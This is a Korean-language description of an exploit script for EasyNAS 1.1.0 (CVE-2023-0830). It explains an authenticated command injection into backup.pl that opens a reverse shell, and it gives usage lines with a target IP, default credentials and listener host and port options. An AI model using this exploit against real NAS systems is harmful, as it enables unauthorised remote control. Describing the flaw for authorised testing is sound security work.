
EasyNAS 버전 1.1.0에 대한 익스플로잇입니다. 취약점은 명령어 삽입 결함이며, 인증이 필요합니다.
이 Python 스크립트는 통합 리스너를 포함한 향상된 기능을 갖춘 EasyNAS 버전 1.1.0을 위한 강력한 익스플로잇입니다. 악용되는 취약점은 인증이 필요한 명령 삽입 취약점입니다.
스크립트는 대상 서버와 세션을 설정한 후 사용자가 제공한 자격 증명으로 로그인 요청을 보냅니다. 인증에 성공하면 스크립트는 실행 시 사용자가 지정한 IP와 포트로 리버스 셸 연결을 여는 페이로드를 구성합니다. 이 페이로드는 URL 및 Base64 인코딩된 후 조작된 GET 요청을 통해 서버의 backup.pl 파일에 주입됩니다.
Ivan Spiridonov (xbz0n) https://xbz0n.sh
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444
--mode {shell,reverse} 익스플로잇 모드: shell (통합 리버스 셸) 또는 reverse (외부 리스너)
--lhost IP_ADDRESS 리버스 셸 리스너의 IP 주소 (기본 자동 감지)
--lport PORT 리버스 셸 리스너의 포트 (기본값: 4444)
--protocol {http,https} 사용할 프로토콜 (기본값: https)
--verbose 자세한 출력 활성화
--shell {bash,sh,python} 통합 리스너에 사용할 셸 유형 지정 (기본값: bash)
이 스크립트는 교육 목적 및 승인된 침투 테스트 전용입니다. 네트워크나 시스템에 대해 침투 테스트를 실행하기 전에 항상 명시적 허가를 받으십시오.
책임감 있게 사용하십시오.